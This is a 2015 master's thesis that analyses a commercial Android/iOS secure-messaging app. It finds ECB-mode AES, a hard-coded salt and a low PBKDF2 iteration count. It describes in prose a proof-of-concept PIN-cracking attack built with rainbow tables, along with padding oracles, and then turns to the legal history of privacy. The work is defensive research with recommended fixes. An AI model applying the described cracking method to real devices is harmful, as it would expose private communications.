Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
Privacy in Hos-le Environments
Mafalda Duarte Freitas Mestrado Integrado em Engenharia de Redes e Sistemas Informá9cos Departamento de Ciências de Computadores
2015
Orientador
Luís Antunes, Professor Associado, FCUP
Todas as correções determinadas
pelo júri, e só essas, foram efetuadas.
O Presidente do Júri,
Porto, ______/______/_________
Abstract
In recent decades, mobile networks and mobile devices with significant computing power have
grown in popularity and availability. With ubiquitous Internet access, the public now depends on
online services and applications to perform activities that range from everyday social interaction
to the exchange of secure communications of the highest level. Each of these activities has its
own requirements, and involves different risks, but they have in common a fundamental challenge:
to exchange private information in a shared communication channel that they cannot control.
In the present work we approach two very different scenarios. In the first scenario, there
is the need to provide secure, encrypted, mobile communications to high visibility government
entities that are likely to be individually targeted. In the second scenario, there is the need to
protect the average Internet user from unwilling exposure to local data interception, privacy
breaches, identity theft or bulk collection of private data.
In the context of secure communications in the first scenario, we closely examine a mobile
application that is currently in the market, with claims that it can provide a secure communication
channel through any set of Android or iOS smartphones. We analyze the application deployment
and it’s code, and describe the vulnerabilities found during that analysis, comparing them with
the well known vulnerabilities of Wireless Protected Access (WPA)1. We develop a proof-of-
concept attack that demonstrates that those vulnerabilities make the application unsuitable to
be used to provide a secure communication channel. We also recommend some steps to improve
the application and to prevent the commercialization of software solutions whose safety has not
been tested.
In the second scenario, to address the protection of the average Internet users, we start by
doing a historical analysis of the concept of privacy as a human right. Our goal is to establish the
level of privacy that each individual can rightly aspire to, and what provisions have been made
in the past to preserve that level of privacy. We show that the technological development has
constantly been a source of danger to personal privacy and freedoms, and that a constant effort
must be done to counteract that effect. We then review current initiatives to protect citizens
from massive surveillance and bulk data collection, and design our own tool to help the average
user regain control over his or her online experience.
1
Resumo
Nas últimas décadas tem havido um crescente aumento na disponibilidade e popularidade de
redes e dispositivos móveis, estes últimos com com um poder de computação cada vez mais
significativo. Com acesso ubíquo à Internet, o público depende cada vez mais de serviços e
aplicações online para atividades que vão desde a interação social diária a comunicações seguras
do mais alto nível. Cada uma destas atividades tem necessidades específicas e envolve riscos
diferentes, mas têm em comum um desafio fundamental: trocar informação privada num canal
de comunicação partilhado que não podem controlar.
Neste trabalho abordamos dois cenários muito diferentes. No primeiro, existe a necessidade
de providenciar comunicações móveis seguras e encriptadas para entidades governamentais. Estas
têm muita visibilidade e uma probabilidade elevada de serem alvo de ataque. No segundo
cenário, existe a necessidade de proteger os utilizadores comuns da Internet da interceção local
de informação, da invasão de privacidade, do roubo de identidade e da recolha em massa de
dados privados.
No contexto das comunicações seguras, inserido no primeiro cenário, examinamos uma
aplicação móvel existente no mercado, que afirma providenciar um canal de comunicações seguro
entre qualquer par de smartphones Android ou iOS. É feita uma análise da aplicação e do seu
código, e as vulnerabilidades encontradas durante essa análise são descritas e comparadas com
vulnerabilidades reconhecidas do WPA1. Desenvolvemos um ataque demonstrativo para mostrar
que as vulnerabilidades encontradas tornam a aplicação incapaz de providenciar um canal de
comunicação seguro. Recomendamos também alguns passos para melhorar a aplicação e para
prevenir a comercialização de soluções de software cuja segurança não foi adequadamente testada.
No segundo cenário, para abordar a proteção do utilizador comum na Internet, começamos
por fazer uma análise histórica do conceito de privacidade como um direito fundamental. O nosso
objetivo é estabelecer qual é o nível de privacidade a que cada indivíduo pode aspirar, e que
medidas é que foram tomadas no passado para preservar esse nível de privacidade. Mostramos
que o desenvolvimento tecnológico tem sido uma fonte constante de perigo à privacidade e às
liberdades individuais, e que é necessário desenvolver um esforço permanente para contrariar esse
efeito. Revemos as iniciativas existentes para proteger os cidadãos da vigilância permanente e da
recolha de dados em massa, e criamos a nossa própria ferramenta para permitir que o cidadão
comum volte a ganhar controlo sobre a sua experiência online.
2
Dedication
I dedicate this work to my parents, who I’d choose again if I had another chance at life, to my
sister, my greatest joy, in the hope she grows to a better world, to Hugo, who I met so briefly,
but whose talent and passion still inspire me, and to all the programmers and hackers out there
that work in the shadow so that others can bring their stories to light.
3
Acknowledgments
First and foremost, I would like to thank my thesis advisor, Luís Antunes, for his guidance,
support and understanding. His dedication made this work possible.
In November 2013, I had the opportunity to join the Centro de Competências em Cibersegu-
rança e Privacidade, at University of Porto. My time at C3P was an extraordinary experience,
giving me renewed energy and passion for my work. Much of the work presented in this thesis
was made possible by the assistance and expertise provided by my colleagues at C3P, who also
provided me with much needed help and companionship. In particular, I am very grateful to Luís
Maia, Luís Valente, and Pedro Brandão, who gave me precious support, and the right advice
and insights in the right moments.
I am very grateful to Filipa Calvão for her time and support. Her collaboration, together
with the team at Comissão Nacional de Protecção de Dados, was essential to the development
and success of C3Priv, and I truly appreciate the work we did together.
I have to thank both Filipa Calvão and Luís Torgo for making my defense a moment I enjoyed
and will remember fondly. I appreciate their kind words and the positive criticism.
I thank Alexandra Ferreira for her unwavering support, her faith in my abilities, and the
expert navigation through the dangerous seas of academic bureaucracy.
To my friends, Mário, Pedro, Cristiano, Daniel, Patrícia, Ivo, Rui and André, I thank for
the late night talks, the hours of fun, my new TF2 skills and for remembering me regularly that
there is a lighter side to life. I am forever grateful to Mário, who dreamed for me when I forgot
how to.
Last, but certainly not least, I thank my parents, Paula and Júlio, and my sister Matilde. I
am deeply grateful for the financial and moral support, for believing in me when I did not, and
for always being near, despite the distance. Your unconditional love and encouragement keeps
pushing me forward.
4
Contents
Abstract 1
Resumo 2
1 Introduction 1
2 App Analysis 3
2.1 The Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2.2 Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.2.1 Electronic Codebook (ECB) encryption mode . . . . . . . . . . . . . . . . 5
2.2.2 Number of iterations of the Pseudorandom Function (PRF) in Password-
Based Key Derivation Function 2 (PBKDF2) . . . . . . . . . . . . . . . . 5
2.2.3 Use of a fixed salt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
3 Proposed attack 7
3.1 Description of WPA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
3.2 Comparison with our software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
3.3 A distributed attack on WPA1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.4 Padding Oracle Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
3.5 Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
3.6 Possible improvements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
4 Privacy in hostile environments 14
4.1 The right to be let alone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
5
CONTENTS 6
4.2 Mass surveillance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
4.3 Privacy and technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
5 Easy to use Privacy: C3Priv 18
5.1 Guiding premises . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
5.2 Privacy By Default . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
5.3 Recognizing Limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
5.4 Proposed Solution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
5.5 Advantages of Open Source . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5.6 Selected Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
5.7 Selected Browser Add-ons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
5.8 Observations and Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
5.9 Future . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
5.9.1 Creating an indistinguishable online identity . . . . . . . . . . . . . . . . 25
5.9.2 Surveying users needs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
6 Conclusion 27
Annex A - Portable Applications 29
Annex B - Firefox Add-Ons 31
Acronyms 33
Bibliography 35
List of Figures
3.1 Example of PKCS5 Padding in blocks containing 3, 5 and 8 byte messages, in
blocks of 8 bytes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.2 Padding oracle attack on the last byte of an 8 byte block, producing an incorrect
padding. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.3 Padding oracle attack on the last byte of an 8 byte block, producing a correct
padding of 0x01. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
3.4 Padding oracle attack on the second-last byte of an 8 byte block, producing an
incorrect padding. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
3.5 Padding oracle attack on the second-last byte of an 8 byte block, producing a
correct padding of 0x02. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
5.1 PortableApps menu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
5.2 Contents of a Universal Serial Bus (USB) pen-drive with C3Priv already installed 22
5.3 Volume of C3Priv downloads from February 2014 to October 2014 . . . . . . . . 24
5.4 C3Priv download distribution globally . . . . . . . . . . . . . . . . . . . . . . . . 24
5.5 C3Priv download distribution in Europe . . . . . . . . . . . . . . . . . . . . . . . 25
7
List of Tables
2.1 List of the files found in the smartphone’s Secure Digital (SD) cards . . . . . . . 4
2.2 Specific values that PBKDF2 receives as input . . . . . . . . . . . . . . . . . . . 4
3.1 PBKDF2 Key Derivation in WPA1 and in the analyzed application . . . . . . . . 8
8
Chapter 1
Introduction
In the early days of telephony, circuit switched connections created a communication channel that
was well defined and exclusive to the participants. This allowed the use of wire telegraph circuits
to establish secure connections between parties that needed to keep their communications secret.
A famous example of one such use is the Direct Communications Link between Washington and
Moscow, known as Washington-Moscow Hotline. This line, established in 1963, was a secure
emergency communications channel between the American and the Russian government.
Unlike the more modern package based, connectionless networks, the telephone switched
networks were very linear. There were few telecommunication companies providing telephony
services, and the small number of users allowed them to have a great level of control over the
infrastructure. The communications usually were not private, but to access them, one had to
have physical access to the network. To keep the privacy in special communication channels,
direct lines such as the Washington-Moscow Hotline used encryption to ensure that only the
receiving end could receive the plaintext message, and the lines themselves where deployed in
secret underground tunnels, to stop physical interception.
Initially, the volume of data exchanged through these connections was very small. The
messages where mostly text, and beyond the daily tests, the system was only rarely used. The
one time tapes used to keep messages encrypted during transit where provided by both sides,
and carried half across the world.[37] With the rise of satellite communications, however, and
the falling prices in both communication equipment and telephone data plans, land lines and
switched circuit networks were replaced by mobile and packet switched networks, such as the
Internet. Today, the pervasiveness of Global System for Mobile Communications (GSM), Third
Generation (3G) and Fourth Generation (4G) mobile networks, and the availability and low
cost of devices to access them, makes them the ideal medium for always-ready communication
channels between any set of terminals, independently of location.
Rather than relying on the security of the network to protect communications, as was done
with private landlines, or even in satellite based communications, access through this shared
networks relies heavily on the terminal’s ability to preserve the secrecy and integrity of the
1
CHAPTER 1. INTRODUCTION 2
messages exchanged. With the evolution of mobile phones to PDAs, and later to smartphones, it
became increasingly easier to ensure the processing power to build terminals that could rise up
to that challenge. But, as the complexity of the technology grew, so did the odds of committing
mistakes or oversights in the design and implementation of protocols and terminal applications.
During this work, to gain some insight on the level of security of commercially available
solutions for secret communications through smartphones, we examine an application for secure
communication that is currently available on the market. This application was submitted to
the Centro de Competências em Cibersegurança e Privacidade (C3P) of the University of Porto
for review, and the work performed is done in articulation with the C3P team. We analyze
the application, identify and study flaws and vulnerabilities, and determine if and how those
vulnerabilities may compromise the application’s security. Based on the results of this analysis,
we implement an attack to work as proof of concept of the vulnerabilities found.
We will also examine the concept of privacy as it exists today, how it was created and how
it evolved through history. We will take a brief look at the legal protections offered to citizens
and to how they integrate with the enormous technological growth we have faced in the last
decades, trying to reveal its current shortcomings and the consequences of such shortcomings, in
the present and in the near future.
Finally we will propose, design and implement a tool that aims to offer a greater degree of
control over their privacy to Internet users, whether on their own PCs or on the move.
Chapter 2
App Analysis
In the last semester of 2013 an application for Android and iOS smartphones built for secure
mobile communication was submitted to C3P for analysis. The C3P team examined the system in
order to assess the level of security it provided to both the information stored in the smartphone
and to the communications done through it.
To the scope of the present work, the most relevant aspect was the analysis of the cellphones
internal storage files, and the information achieved through the reverse engineering of the code.
This particular analysis is included in the following chapter, allowing a closer look at the integrity
and security of commercially available solutions that are being deployed and used in real world
scenarios.
2.1 The Application
The brief description of the application that was provided by its creators on their website gives
some insights on its internal workings. They describe their product as a system built to allow
secure Short Message System (SMS) and voice communications through any Android or iOS
smartphone it is installed on, to recipients who use the same application to receive said calls and
SMSs.
The communications done through the app are processed by a server that may be either
privately owned, running on the clients premises, or available “in the cloud”. In the latter case,
the server is rented and kept in the provider company’s facilities, but the client remains the
exclusive user of the system.
In the company’s website, as well as in communications made to several local newspapers, it
is stated that the encryption used by the system is RSA[54]1 with 3072 bit keys, and Advanced
Encryption Standard (AES) with 256 bit keys, both presented as “extremely secure”.
1The RSA is a public-key cryptosystem published in 1978. The name comes from the initials in the surnames
of it’s creators, Ron Rivest, Adi Shamir, and Leonard Adleman.
3
CHAPTER 2. APP ANALYSIS 4
We were provided with a pair of Android smartphones, with the application already installed,
and their respective Personal Identification Numbers (PINs). The PINs unlocked the phones
and allowed the use of the application.
The first step was to examine the smartphones SD cards. After connecting each SD card to
a computer, we where able to examine the file system, which contained the files listed in 2.1. the
files where copied and kept for later use.
Files Present in the SD
Card
IV
Public Key
Private Key
Public Server Key
Table 2.1: List of the files found in the smartphone’s SD cards
We proceeded with the analysis of the application source code, written in Java. We found
that the communications done through the application were being encrypted using public-key
cryptography, through RSA, using the keys found in the SD card. The data stored on the
phone, including the keys and the Initialization Vector (IV), was encrypted with symmetric
cryptography, using AES.
By examining the code, we learned that the key used by AES to encrypt the files was derived
from the application’s PIN, using PBKDF2, which is part of the Public Key Cryptography
Standard (PKCS)5[50]. We also verified that the salt used for PBKDF2 was a fixed string,
composed of six alphabetic characters, which we found declared in plain text inside the code.
The values that are given to PBKDF2 as input can be seen in 2.1.
Upon examination it was established that the IV contained in one of the files is device
dependent, and is generated and saved in the SD Card in the application’s first run. This IV
was encrypted with AES, ECB mode and PKCS5 padding, as where the remaining files, using
PBKDF2 Input Parameters
Description Value
PRFHash-based Message Authentication
Code (HMAC)-
Secure Hash Algorithm (SHA)1
Master Password PIN
Salt value fixed string
Number of iterations of the PRF required 1024
Expected length of the derived key 256
Table 2.2: Specific values that PBKDF2 receives as input
CHAPTER 2. APP ANALYSIS 5
the PIN as key.
2.2 Vulnerabilities
At a first glance, the encryption algorithms used seem adequate, with both being internationally
recommended ciphers. However, a closer look shows several choices made in their deployment
that can be considered to have been poorly done. Of this choices, the most significant are the
encryption mode selected for AES, the number of iterations of the PRF, and the use of a fixed
salt. As we will show, this choices severely compromise the application’s security.
2.2.1 ECB encryption mode
The encryption mode chosen for AES is ECB, which is a weak choice for the cipher’s mode of
operation. ECB’s main problem lies in the fact that all blocks of plaintext that are identical
will produce the same ciphertext when encrypted with the same key. This behavior reveals
patterns in the encrypted data that may result in the loss of confidentiality. With key reuse, an
attacker can compare sets of know plaintext and the respective ciphertext with unknown blocks
of ciphertext to decrypt them. The fact that all blocks will be deciphered in the same way also
makes ECB vulnerable to replay attacks.
2.2.2 Number of iterations of the PRF in PBKDF2
The choice of HMAC-SHA1 as a pseudorandom function for PBKDF2 is still considered
appropriate, despite some shortcomings regarding SHA1 itself. SHA1 is considered vulnerable to
collision attacks, with know attacks since 2005 and abandonment by federal agencies and
companies like Microsoft[44], Mozilla[47] and Google[46]. Since HMACs are less affected
by collisions than their underlying hashing algorithms, SHA1 can still be used for this end.
Nevertheless, the National Institute of Standards and Technology (NIST) policy from 2012
advises the use of SHA256 or SHA3 as a replacement to SHA1. [43]
Regarding the number of iterations of the pseudorandom function in PBKDF2, in 2000 the
PKCS5 standard recommended 1000 iterations. At the time, it was already foreseeable that
this number would have to be increased to match the growing computing power of more recent
Central Processing Units (CPUs). NIST, in a recommendation from 2010, advised that the
iteration count for PBKDF2 should be “as large as possible, as long as the time required to
generate the key using the entered password is acceptable for the users.” The minimum iteration
count is still considered 1000, but the document states that “for especially critical keys, (...) an
iteration count of 10,000,000 may be appropriate.”[51] 10.000.000 iterations may be excessive in
this case, since the limitations of the smartphone’s hardware would result in unresponsiveness of
the device, and that situation would not be acceptable to users. However, an iteration count of
CHAPTER 2. APP ANALYSIS 6
1024 is too low to effectively delay attacks.
2.2.3 Use of a fixed salt
Of the vulnerabilities found, the most alarming is possibly the use of a fixed salt. In cryptography,
a salt is a piece of random data that is combined with a password, usually by concatenation. To
avoid storing the password in plain text, the combined string is hashed, and only this hash and
the respective salt is kept.
Users often choose short and simple passwords that are easier to remember, but these
passwords offer little security. Adding a salt to such a password increases it’s length and
complexity to a more reasonable level.
Additionally, salts substantially increase the difficulty of cracking passwords with a dictionary
attack against a hash list. Without a salt, the attacker would have to build pre-computed hash
tables (known as rainbow tables) with the hashes of all possible passwords. When a salt is used,
the involved workload is increased, since the attacker will now have to build tables containing
the hashes of each possible password, combined with each possible salt.
Regarding the choice of a salt, the Request For Comments (RFC) 2898 states that, if there
is no need to distinguish different uses of the key, “the salt may be generated at random and
need not be checked for a particular format by the party receiving the salt. It should be at least
eight octets (64 bits) long.”[50] The salt used in the application is fixed, not random, and shorter
than the recommended 64 bits, with a length of only 48 bits. Although it is not public, since we
had to look into the code to find it, it is still short enough to make the password vulnerable to
attacks.
Since we know the salt, we can use it to build a rainbow table with the hashes of all the
combinations of the salt with the possible PINs, with the same cost we had if no salt was used,
effectively defeating it’s purpose. Furthermore, since the salt is reused in all smartphones running
the application, our rainbow tables can be reused to crack the PIN in those other instances,
saving us the added computing effort.
Chapter 3
Proposed attack
As we will see in this section, the vulnerabilities found in the application are enough to plan
an attack. We will show how that attack takes a very similar form to the widely performed
attacks on WPA, and how the software for such an attack can be modified to work on our own
scenario. We will show that using this method, it is possible to recover the application’s PIN in
any smartphone running it, effectively taking control over the communications done through the
smartphone. To start the attack, the only requirement is a copy of the SD card’s files.
3.1 Description of WPA
There are two main modes of WPA:
• WPA Enterprise, which is based on Remote Authentication Dial In User Service (RADIUS)
authentication;
• WPA Personal, which uses a Pre-Shared Key (PSK). WPA PSK has two variants:
– WPA1, based on Temporal Key Integrity Protocol (TKIP);
– WPA2, with Counter Mode Cipher Block Chaining Message Authentication Code
Protocol (CCMP), based on AES.
WPA1, which was deprecated in 2012’s revision of the 802.11 standard, uses a 256 bit key to
encrypt network traffic. This key can be either a string of 64 hex digits, or derived from a
passphrase of 8 to 63 printable American Standard Code for Information Interchange (ASCII)
characters. In this last case, a derivation function, PBKDF2, is applied to the passphrase, to
provide a key with the necessary length. In WPA1, PBKDF2 uses 4096 iterations of HMAC-SHA1
and uses the network’s Service Set Identifier (SSID) as salt.
In theory, due to the huge number of possible combinations of SSIDs and passphrases that can
be used in a network, brute-force or dictionary attacks on WPA1 would be infeasible. However,
7
CHAPTER 3. PROPOSED ATTACK 8
empirical observation shows that the SSID of domestic networks is rarely changed from the
default hardware brand or Internet Service Provider (ISP) name, meaning that many domestic
wireless networks share the salt used in the key derivation process. This allows the computation
and reuse of huge pre-computed hash tables that combine possible keys with each of the most
common SSIDs.
Since WPA1 was specified as a temporary replacement for Wired Equivalent Privacy (WEP)
that was compatible with older hardware, this possibility of attack was not taken as a serious
risk. However, WPA1 remained in use for much longer, providing motivation for the creation of
software to simplify WPA1 cracking, and for the publication of very large pre-computed hash
tables for the most common brands and ISPs.
3.2 Comparison with our software
Table 3.2 summarizes the WPA1 password derivation process, and compares it to that of the
application under analysis at C3P.
WPA1 Analized Application
IVCaptured in the handshake,
encrypted with the PSK
Stored in a file, encrypted
with the pin, using AES
Key Captured in the network Stored in a file in the sdcard
Key Derivation
FunctionPBKDF2 PBKDF2
Pseudo Random
FunctionHMAC-SHA1 HMAC-SHA1
Master Password Passphrase (PSK) PIN
HMAC-SHA1 Salt Network SSID Fixed salt string
HMAC-SHA1 Iterations 4096 1024
Derived Key Lenght 256 bit 256 bit
Table 3.1: PBKDF2 Key Derivation in WPA1 and in the analyzed application
The table shows that the process has many similarities, which allow us to start from the
attack of WPA1, and adapt it to our application. There are also some small differences, such as
the PIN being shorter than a typical network passphrase, and a fixed string being used as salt,
instead of the SSID. Of this differences, however, the only one that will reflect itself on the code
is the PRF number of iterations, which is four times smaller compared to that of WPA1.
The use of a fixed salt provides an advantage, since it means that we will be able to reuse
the generated set of rainbow tables to attack other devices using the same application.
CHAPTER 3. PROPOSED ATTACK 9
3.3 A distributed attack on WPA1
CoWPAtty [57] is a program that performs offline dictionary attacks against WPA/WPA2
networks that use PSK based authentication, which is the case with WPA Personal. CoWPAtty’s
attack can be accelerated if pre-computed Pairwise Master Key (PMK) hashes for the target
SSID are provided. This can be produced using genpmk, a script that comes included with the
software.
Genpmk receives as input a password dictionary, salts each password with the desired SSID,
and generates a file with the hashes of the salted passwords. This hashes can then be provided
to CoWPAtty together with the SSID of the target network, and a file containing a capture of
the four-way TKIP handshake between one client and the Access Point (AP).
In 2011, a group of students from the University of Colorado published an adapted version of
coWPAtty that could speed up the attack on WPA1 by using several nodes to perform distributed
look-ups on rainbow tables.[55] They wrote a Java web application to be run on the master
node that handled the job submission process and the job queue. This master node was also
responsible for starting the worker nodes in the cluster via Secure Shell (SSH), and by dividing
the work equally among them.
Due to the similarities between attacks, and the significant speed up obtained with distributed
lookups, we opted to study and adapt this software to develop our own program to exploit of
the smartphones vulnerabilities. Besides the changes needed in the software to adapt it to the
differences in our use of PBKDF2, our worker nodes did not need to perform much of the work
that coWPAtty did, such as processing the capture files and the four-way handshake. We also
needed our program to perform an additional test, that would determine which of the rainbow
table entries corresponded to the correct PIN.
After a close examination of the code of the distributed version of the attack, and given the
differences between coWPAtty’s requirements and our own, we concluded that the best approach
would be to write new software for the worker nodes. This new approach would allow us to
create cleaner software, that would be easier to debug and that would fit more tightly with our
objectives. However, due to lack of experience working with web applications and the JBoss
web application server, especially when considering the aditional dificulties of working with
distributed computation nodes, the new version of the application took more than the expected
time to develop, and presented an excessive amount of bugs. To adress this issues, we eventually
decided not to develop a distributed program, and focused instead in obtaining a non-distributed
program, that was only loosely based in the original distributed code. This last version was still
controled remotely by another node that offered a web service to start, stop and monitor the
worker node.
CHAPTER 3. PROPOSED ATTACK 10
3.4 Padding Oracle Attack
In cryptography, a padding oracle attack is an attack that can be performed on the padding of
messages encrypted with block ciphers. The attack is only possible if, in failing to decrypt the
message because the padding is incorrect, the receiver discloses that information. When this
happens, an attacker can gain information about the plaintext by modifying the message and
asking the Oracle to decrypt it. A sucessfull attack can decrypt the message without knowing
the encryption key.
The application under analysis uses the Java Cipher class[2], with the AES/ECB/PKCS5Padding
transformation. PKCS5 padding is defined in PKCS 5[? ]. To pad a message, this method
appends the n bytes required to fill the block, each one containing the value n. An example of
this type of padding for 8-byte blocks can be seen in 3.4. With this type of padding, when the
size of the message equals the block size, an extra block is appended, filled with the appropriate
padding.
Since AES is a block cipher, and is operating in ECB mode, all blocks ciphered with it may
be attacked with this method. The doFinal() method provided by the Cipher class is appropriate
to implement an oracle, since it returns a specific error (a BadPaddingException) when it fails
to decrypt a message with a correct padding.
✄ �
1 public final int doFinal( byte[] input,
2 int inputOffset,
3 int inputLen,
4 byte[] output,
5 int outputOffset)
6 throws ShortBufferException,
7 IllegalBlockSizeException,
8 BadPaddingException✂ ✁
Listing 3.1: The Java Cipher class method doFinal(). The BadPaddingException thrown by the
function enables the padding oracle attack.
This is the case of the ECB cypher mode used in our application, that requires the message
to be encrypted to have a lenght multiple of 16 bytes. The message can be altered and sent to
the oracle, and the oracle replies saying if the message is well formed. A well formed message has
a correct padding, that makes sense when decrypted. Thus, the last bytes of a message may be
changed at will to produce correct paddings, until the attacker has decrypted the whole message,
without ever knowing the encryption key. Images3.4, 3.4, 3.4 and 3.4 show the decryption of the
last two bytes of the message. The process can be repited until the entire message is decrypted.
CHAPTER 3. PROPOSED ATTACK 11
Figure 3.1: Example of PKCS5 Padding in blocks containing 3, 5 and 8 byte messages, in blocks
of 8 bytes.
Figure 3.2: Padding oracle attack on the last byte of an 8 byte block, producing an incorrect
padding.
Figure 3.3: Padding oracle attack on the last byte of an 8 byte block, producing a correct padding
of 0x01.
CHAPTER 3. PROPOSED ATTACK 12
Figure 3.4: Padding oracle attack on the second-last byte of an 8 byte block, producing an
incorrect padding.
Figure 3.5: Padding oracle attack on the second-last byte of an 8 byte block, producing a correct
padding of 0x02.
3.5 Results
In order to crack the application’s PIN number, we attempted to decrypt the IVs found in the
SDs card with each of the keys present in our pre-generated rainbow tables. To verify if the
key suceeded, we caught the Java Exceptions thrown by the doFinal() method shown in 3.1.
Whenever the key fails to correctly decrypt the IVs , the method throws a BadPaddingException,
meaning that it was provided with the wrong key.
The delay introduced with develpment difficulties and the necessary adaptations to the
existing code resulted in insufficient time to complete the program. Therefore, the application
built has some stability issues and produces unreliable results. However, the test runs performed
CHAPTER 3. PROPOSED ATTACK 13
showed that the attack could be made with success, and we were able to recover the PINs and to
sucessfully gain full access to the application, demonstrating that the application was unsuitable
to provide a secure communication channel.
3.6 Possible improvements
To increase the security of the application, we suggest a larger iteration count of HMAC-SHA. A
popular current application of HMAC-SHA1 is in WPA1, where the iteration count is 4096. To
increase the dificulty to compute pre-computed hash tables, it would be advisable to use more
that the present 1024 iterations of HMAC-SHA1 to derive the AES encryption key, especially
when considering the level of security that the application intends to achieve.
The choice of salt should also be revised. The salt should be longer and generated randomly,
so that when appended to the PIN it may result in a strenghtened passphrase. This is especially
relevant if we consider that PINs are usually very short, with a length between 4 and 6, and
formed exclusively by digits. If the appended salt is not long enough, hashing a list of bruteforced
passwords can result in a sucessfull attack without much computing effort. The salt should also
be different for each device, so that each device requires it’s own set of rainbow tables to be
computed for a successful attack.
The operation mode for AES requires additional consideration, since ECB is too simple and
easily attacked. To avoid padding oracle attacks on the cyphertext, AES should be used with an
operation mode that allows it to work as a stream cipher, or replaced with a stream cipher.
To ensure the correction of the code in such a critical application, the code should be reviewed
and audited prior to launching the application commercially. The potencial buyer should also
consider creating a set of standards that the developers must follow to ensure their product has
an adequate level of quality and can work with the required level of security.
Chapter 4
Privacy in hostile environments
Throughout this work, we will define the right to privacy as the “right to keep a domain around
us, which includes all those things that are part of us, such as our body, home, property, thoughts,
feelings, secrets and identity. The right to privacy gives us the ability to choose which parts in
this domain can be accessed by others, and to control the extent, manner and timing of the use
of those parts we choose to disclose.”[52] In the present chapter, we will review the evolution of
this concept from the late 19th century to the present day, following court cases that challenged
the legality of certain methods of information gathering while pursuing an elusive definition of
the right to privacy. We will show how such cases are closely related to the use of new technology,
and how the inability to understand the growing complexity of that technology hinders the ability
of the law to protect citizens from abuse.
4.1 The right to be let alone
The history of privacy as a human right is intimately connected with the history of technology.
Before the advent of the printing press, breaches of privacy were very limited, since news did not
propagate further than what was strictly necessary, and records, official and otherwise, were rare
and hard to access.
The first publication to advocate privacy as a right was written by Samuel Warren and Louis
Brandeis, and published in 1890. Their main concern was that the laws in place did not account
for technological advancements like the instantaneous photography, and that those advancements,
coupled with the widespread circulation of newspapers, had opened a new market for “idle
gossip, which can only be procured by intrusion upon the domestic circle”. In their article they
examine concepts already present in the law, such as libel, slander, breach of confidence and
intellectual property, only to conclude that they do not adequately cover the harm that comes to
the individual when facts of his private sphere come to the scrutiny of the public eye. They go
on to prove that there was a principle in the existing law that afforded what they called “right to
be let alone”. [56]
14
CHAPTER 4. PRIVACY IN HOSTILE ENVIRONMENTS 15
In 1928, Brandeis was a justice on the Supreme Court and expressed a dissenting opinion in
Olmstead v. United States[4], a court case that became famous as the first USA Government
accusation based in wiretapping. Although the defendant, accused of running a huge network
dedicated to “bootlegging”, plead the 4th and 5th Amendments1, the government considered that
there was no similarity between this new telephone technology and written mail. Furthermore,
the wiretapping had been done in boxes on the street, in the neighborhood where the defendant
lived, thereby excluding any possibility that the information gathered had been obtained outside
the existing laws concerning the gathering of proof. Brandeis argued that the 4th and 5th
ammendments where created to protect citizens from force and violence, which where at the time
the only means by which the government could compel self-incrimination. However, technological
advancements had allowed the government to change to more subtle methods, that nevertheless
endangered citizens rights. He questions whether the constitution grants any protection against
such abuses and concludes that it does. He reasons that the 4th and 5th ammendments are broad
in scope, as the constitution aims to protect Americans from intrusion of the Government in their
private lives, and that to protect the right to be let alone, "every unjustifiable intrusion by the
government upon the privacy of the individual, whatever the means employed, must be deemed
a violation of the Fourth Amendment”. He goes on to expose the fact that the use of evidence
that was obtained ilegally (wiretapping was a crime according to the law of Washington), and
through infringement of such a fundamental right, was a violation of the 5th amendment.
The ruling in Olmstead v. United States was eventually overturned by another case, Katz v.
United States[3], in 1967. This case defined that immaterial intrusion with the aid of technology,
such as wiretapping, constitutes a search, and as such it is covered by the rules for reasonable
search and seizure. It also extended the scope of the 4th amendment to all the places where an
individual has a "reasonable expectation of privacy". Justice Harlan gave a concurring opinion in
which he established what became known as Harlan’s test. This test established that there was a
right to privacy whenever the individual exhibited an expectation of privacy, and where society
recognized that expectation of privacy to be reasonable.
In “First Principles of Communications Privacy”, author Susan Freiwald states her belief
that “difficulty with the reasonable expectation of privacy test has led courts to avoid using it
to resolve the constitutional status of modern communications technologies. But the answer
cannot be to withhold constitutional protection from electronic communications, as courts do
when they fail to act. (...) If courts do not establish constitutional protections for the electronic
communications that are now central to our lives and work, then we will have accorded law
enforcement surveillance powers of Orwellian magnitude.”[49]
1The 4th ammendment to the United States Constitution protects the right to be secure against unreasonable
searches and seizures. The 5th ammendment protects, among others, the right to due process. A process is not
due process if it conficts with any of the provisions of the constitution,or if it “offends some principle of justice so
rooted in the traditions and conscience of our people as to be ranked as fundamental”. [Snyder v. Massachusetts,
